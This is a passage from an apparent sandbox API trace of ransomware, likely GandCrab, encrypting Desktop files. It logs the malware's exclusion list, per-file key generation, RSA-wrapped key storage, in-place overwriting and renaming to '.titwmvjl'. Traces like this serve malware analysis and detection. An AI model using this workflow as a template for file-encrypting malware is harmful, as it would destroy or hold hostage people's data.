[0088.311] GetLastError () returned 0x0 [0088.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.311] CryptDestroyKey (hKey=0x5038f8) returned 1 [0088.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.311] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.312] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.312] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.312] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x167a6, lpOverlapped=0x0) returned 1 [0088.325] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffe985a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.325] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x167a6, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x167a6, lpOverlapped=0x0) returned 1 [0088.327] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.327] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0088.328] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.332] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.332] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.332] CloseHandle (hObject=0x2ac) returned 1 [0088.333] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ckyl-mx28ax_ic5.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ckyl-mx28Ax_IC5.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ckyl-mx28ax_ic5.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0088.333] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.334] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.334] lstrcmpW (lpString1="CtBf.bmp", lpString2=".") returned 1 [0088.334] lstrcmpW (lpString1="CtBf.bmp", lpString2="..") returned 1 [0088.334] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="CtBf.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp" [0088.334] lstrlenW (lpString=".titwmvjl") returned 9 [0088.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp") returned 38 [0088.334] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.334] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp.titwmvjl") returned 47 [0088.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp") returned 38 [0088.334] lstrlenW (lpString=".bmp") returned 4 [0088.334] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.334] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0088.334] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0088.334] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp") returned 38 [0088.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp") returned 38 [0088.334] lstrcmpiW (lpString1="CtBf.bmp", lpString2="desktop.ini") returned -1 [0088.334] lstrcmpiW (lpString1="CtBf.bmp", lpString2="autorun.inf") returned 1 [0088.334] lstrcmpiW (lpString1="CtBf.bmp", lpString2="ntuser.dat") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="iconcache.db") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="bootsect.bak") returned 1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="boot.ini") returned 1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="ntuser.dat.log") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="thumbs.db") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="ntldr") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="NTDETECT.COM") returned -1 [0088.335] lstrcmpiW (lpString1="CtBf.bmp", lpString2="Bootfont.bin") returned 1 [0088.335] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp") returned 38 [0088.335] lstrlenW (lpString=".bmp") returned 4 [0088.335] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.335] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0088.335] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.335] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.336] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ctbf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0088.336] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.336] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0088.337] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.337] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.337] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.338] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.338] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.338] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.338] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0088.338] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.338] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.338] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.339] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.340] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.340] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.340] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.340] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0088.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.340] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.340] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.341] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.342] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503278) returned 1 [0088.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.342] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.342] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.342] GetLastError () returned 0x0 [0088.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.343] CryptDestroyKey (hKey=0x503278) returned 1 [0088.343] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.343] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.343] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.343] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.344] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503478) returned 1 [0088.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.344] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.344] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.344] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.345] GetLastError () returned 0x0 [0088.345] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.345] CryptDestroyKey (hKey=0x503478) returned 1 [0088.345] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.345] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.345] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.345] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.346] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x87d6, lpOverlapped=0x0) returned 1 [0088.351] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff782a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.352] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x87d6, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x87d6, lpOverlapped=0x0) returned 1 [0088.352] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.353] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0088.354] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.357] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.357] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.357] CloseHandle (hObject=0x2ac) returned 1 [0088.358] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ctbf.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CtBf.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\ctbf.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0088.359] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.359] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.359] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0088.359] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0088.359] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a09d2ca4deb61a.lock" [0088.359] lstrlenW (lpString=".titwmvjl") returned 9 [0088.359] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 54 [0088.359] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.359] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 63 [0088.360] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 54 [0088.360] lstrlenW (lpString=".lock") returned 5 [0088.360] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.360] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0088.360] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.360] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.360] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.360] lstrcmpW (lpString1="dbem3dR4dg5q7gd.gif", lpString2=".") returned 1 [0088.360] lstrcmpW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="..") returned 1 [0088.360] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="dbem3dR4dg5q7gd.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif" [0088.360] lstrlenW (lpString=".titwmvjl") returned 9 [0088.360] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif") returned 49 [0088.361] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.361] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif.titwmvjl") returned 58 [0088.361] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif") returned 49 [0088.361] lstrlenW (lpString=".gif") returned 4 [0088.361] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.361] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0088.361] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0088.361] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.361] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif") returned 49 [0088.361] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif") returned 49 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="desktop.ini") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="autorun.inf") returned 1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="ntuser.dat") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="iconcache.db") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="bootsect.bak") returned 1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="boot.ini") returned 1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="ntuser.dat.log") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="thumbs.db") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="CRAB-DECRYPT.html") returned 1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="ntldr") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="NTDETECT.COM") returned -1 [0088.361] lstrcmpiW (lpString1="dbem3dR4dg5q7gd.gif", lpString2="Bootfont.bin") returned 1 [0088.362] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif") returned 49 [0088.362] lstrlenW (lpString=".gif") returned 4 [0088.362] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.362] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0088.362] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.362] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.362] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\dbem3dR4dg5q7gd.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\dbem3dr4dg5q7gd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0088.362] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.363] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0088.363] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.363] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.364] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.365] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.365] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.365] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0088.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.365] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.365] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.365] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.366] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.367] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.367] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.367] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0088.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.367] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.367] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.367] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.368] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037f8) returned 1 [0088.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.369] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.369] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.369] GetLastError () returned 0x0 [0088.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.369] CryptDestroyKey (hKey=0x5037f8) returned 1 [0088.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.369] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.370] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0088.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.371] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503378) returned 1 [0088.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.371] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0088.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.371] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0088.371] GetLastError () returned 0x0 [0088.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.371] CryptDestroyKey (hKey=0x503378) returned 1 [0088.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.372] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.372] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.372] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.372] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x1623c, lpOverlapped=0x0) returned 1 [0088.379] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffe9dc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.379] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1623c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x1623c, lpOverlapped=0x0) returned 1 [0088.380] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.381] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, 